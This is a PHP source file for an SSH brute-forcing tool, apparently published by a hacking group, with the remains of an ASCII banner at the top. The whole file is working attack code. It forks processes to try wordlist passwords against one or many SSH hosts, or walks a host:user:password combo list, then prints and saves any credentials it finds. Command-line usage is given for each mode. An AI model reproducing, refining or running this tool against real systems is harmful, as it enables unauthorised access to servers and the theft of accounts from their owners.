|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ * SSH Brute-Forcer * Written by Miyachung * Homepage : http://janissaries.org * Youtube Channel: http://www.youtube.com/janissariesorg * Usage : http://www.youtube.com/watch?v=h5Fx3PBjUCg * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended) * @@ This tool is using process forking system * All rights reserved * Contact with coder: miyachung@hotmail.com or jabber.org */ error_reporting(0); /* * Call the class */ $SSH = new SSHBruter(); /* * Does control if 'ssh2_connect' and 'pcntl_fork' functions not installed * if 'ssh2_connect' or 'pcntl_fork' functions not installed you can't use this brute-forcer tool */ if(!function_exists("ssh2_connect")) { $SSH->showErrorMsg(1); } elseif(!function_exists("pcntl_fork")) { $SSH->showErrorMsg(2); } /* * Parse arguments * There is 3 way to brute * Single : -h -u -w -o

-t * Combolist : -c -o

-t * Multiple : -f -u -w -o

-t */ $options_single = getopt("h:u:w:o:t:"); $options_combo = getopt("c:o:t:"); $options_multi = getopt("f:u:w:o:t:"); /* * Does arguments control! */ if($options_single) { if($options_single["h"] != null && $options_single["u"] != null && $options_single["w"] != null && $options_single["o"] != null && $options_single["t"] != null) { $SSH->SingleBrute( $options_single["h"] , $options_single["u"] , $options_single["w"] , $options_single["o"] , $options_single["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_combo) { if($options_combo["c"] != null && $options_combo["o"] != null && $options_combo["t"] != null) { $SSH->ComboBrute( $options_combo["c"] , $options_combo["o"] , $options_combo["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_multi) { if($options_multi["f"] != null && $options_multi["u"] != null & $options_multi["w"] != null && $options_multi["o"] != null && $options_multi["t"] != null) { $SSH->MultiBrute( $options_multi["f"] , $options_multi["u"] , $options_multi["w"] , $options_multi["o"] , $options_multi["t"] ); } else{ $SSH->showErrorMsg(3); } } else { $SSH->showErrorMsg(3); } class SSHBruter { /* * Prints 'MAIN_MESSAGE' if arguments used wrong */ const MAIN_MESSAGE = "\n*********************************************\n* SSH Brute-Forcer Single or Multiple\n* Written by Miyachung\n* Homepage : http://janissaries.org\n*********************************************\n"; /* * Prints 'NOT_INSTALLED_SSH' if ssh2_connect function not found */ const NOT_INSTALLED_SSH = "Oops! 'ssh2_connect' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'NOT_INSTALLED_PCNTL' if pcntl_fork function not found */ const NOT_INSTALLED_PCNTL= "Oops! 'pcntl_fork' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'ARGMISS' if arguments not specified */ const ARGMISS = "[!]Wrong Usage!\nphp SSHBruter.php -h -u -w -o

-t \nphp SSHBruter.php -f -u -w -o

-t \nphp SSHBruter.php -c -o

-t \n\n"; /* * Counts hosts & passwords , increments in foreach loop */ private $counter = 0; /* * Performs brute force to specified single host arguments -h -u -w -o

-t */ function SingleBrute( $host , $user, $wordlist, $output , $thread ) { echo "\n"; echo "Host: ".$host."\n"; echo "User: ".$user."\n\n"; $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { $this->counter++; $fork = pcntl_fork(); if(!$fork) { $perform_single = $this->SSH( $host , $user , trim($password) , $output ); if($perform_single) { print "Sleeping 120 seconds , PRESS CTRL + C NOW!"; sleep(120); } exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified combo list arguments -c -o

-t */ function ComboBrute( $combolist , $output , $thread ) { $chunk_combolist = array_chunk( file($combolist) , $thread); foreach($chunk_combolist as $combo) { foreach($combo as $hostuserpwd) { $this->counter++; list($host,$user,$password) = split(":",trim($hostuserpwd)); $fork = pcntl_fork(); if(!$fork) { $this->SSH( $host , $user , $password , $output ); exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified host list arguments -f -u -w -o

-t */ function MultiBrute( $hostlist , $user , $wordlist , $output , $thread ) { foreach(file($hostlist) as $host) { $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { $this->counter++; $fork = pcntl_fork(); if(!$fork) { $this->SSH( trim($host) , $user , trim($password) , $output ); exit; } } $this->waitForThreadFinish(); } } } /* * Performs login to host with specified user and password(s) */ function SSH( $host , $user , $password , $output , $port = 22 ) { $connect = ssh2_connect( $host , $port ); if(!$connect) { print "[".$this->counter."] Host: ".$host." Connection Failed\n"; flush(); break; } else { $auth = ssh2_auth_password( $connect , $user , $password ); if($auth) { $a = "*********************************************\n"; $a.= "[+] Found!\n"; $a.= "[+] Host: ".$host."\n"; $a.= "[+] User: ".$user."\n"; $a.= "[+] Password: ".$password."\n"; print $a."[!] If You Want To Stop Brute Press CTRL + C Now!\n*********************************************\n"; self::SaveResult( $output , $a ); return true; } else { print "[".$this->counter."] Trying Host: ".$host." Username: ".$user." Password: ".$password."\n"; flush(); break; } } } /* * All error messages showing from there */ function showErrorMsg( $errno ) { print self::MAIN_MESSAGE; if($errno == 1) { print self::NOT_INSTALLED_SSH; exit; } if($errno == 2) { print self::NOT_INSTALLED_PCNTL; exit; } if($errno == 3) { print self::ARGMISS; exit; } } /* * Waits for threads to finish */ function waitForThreadFinish() { while (pcntl_waitpid(0, $status) != -1) { $status = pcntl_wexitstatus($status); } } /* * Saves everything with this function */ static function SaveResult( $output,$text ) { $open_file = fopen( $output , "a" ); fwrite( $open_file , $text ); fclose( $open_file ); } } # miyachung represents / janissaries.org group ?>